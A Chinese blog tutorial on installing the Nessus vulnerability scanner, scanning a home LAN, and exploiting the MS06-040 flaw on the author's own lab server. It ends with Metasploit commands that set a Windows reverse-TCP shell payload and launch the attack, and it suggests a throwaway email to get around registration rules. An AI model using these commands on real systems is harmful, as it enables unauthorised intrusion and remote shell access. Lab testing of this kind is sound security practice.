0x 00 前言
寫這篇博客,證明我還活着……
0x 01 安裝Nessus
直接官網 www.tenable.com/products/nessus/select-your-operating-system
選擇Nessus Home版下載,下載之後點擊安裝我這裏是Nessus-6.1.0-x64版(附件處有百度網盤鏈接)
安裝開始設置一個用戶名和密碼(記住,使用Nessus時會驗證)
然後選擇文件安裝目錄
之後會提示更新插件,這個要通過官網註冊獲取激活碼來更新的
我們在官網 www.tenable.com/products/nessus/evaluate 註冊賬戶,打開註冊郵箱就可以收到激活碼了~
注意:註冊郵箱不能使用 qq\163\gmail\hotmail 等公共郵箱,要用企業郵箱纔可以
在這裏推薦使用“一小時郵箱”進行註冊,具體使用方法問度娘吧
填好激活碼之後,插件自動更新,我這裏5分鐘左右就更新好了
0x 02 軟件使用
瀏覽器打開 https://localhost:8834 後顯示客戶端界面
輸入先前設置的用戶名密碼登錄
1. 掃描局域網存活主機
點擊“New Scan”,
在提供的默認模版裏選擇一個模版,這裏選擇“Host Discovery”,
在彈出的通用配置裏設置“Name”(本次掃描的名字),“Target”(掃描目標)
我掃的是192.168.1.1全網段的 ,看圖
之後“點擊保存”後會進行自動掃描
2分鐘之後結果就來了,在這裏
看到了米有,9個主機在線,測試結果與真實環境相同的
NMAP也能完成主機探測我會亂說,所以說Nessus牛的地方不是在這,所以下面來了
2. 主機掃描
我在本地搭了個低版本服務器,IP爲192.168.1.112
新建掃描,設置掃描策略爲“Advanced Scan”,
然後 “Target”填上192.168.1.112
因爲掃的是同個局域網內的速度還是比較快的,結果倒是讓我驚呆了Orz...
20個緊急漏洞,8個高危漏洞,醉了有木有 = = 速度戳之
上面MSxx-xxx是微軟漏洞編碼,隨隨便便選擇一個找到Exp就可以愉悅的玩耍了 ~~
接下來漏洞結合MSF進行漏洞利用~
當然,直接根據漏洞的編碼百度一下利用方法也是可以的,這裏就直接用BT5吧
找一個比較老的洞:ms06-040
BT5 的 CMD 輸入 msfconsole 進入MSF歡迎界面(時間略長,等下就OK了)
我們按照MSF的一般執行過程來操作(選擇模版—設置PAYLOAD—設置參數—攻擊)
|
1
|
search ms06_040 // 查找ms06_040相關漏洞模塊 |
找到對應模塊後
|
1
2
3
4
5
6
7
|
use exploit/windows/smb/ms06_040_netapi // 使用ms06_040_netapi模塊show options // 查看漏洞配置信息set PAYLOAD windows/shell/reverse_tcp // 設置PAYLOADset RHOST 192.168.1.112 // 目標IPset LHOST 192.168.1.117 // 本機IP// 端口號 和 目標類型 默認就OK了exploit // 進行攻擊 |
然後看拿到拿到了神馬……
附件:
Nessus-6.1.0-x64 百度網盤:pan.baidu.com/s/1hq48j20 9fgu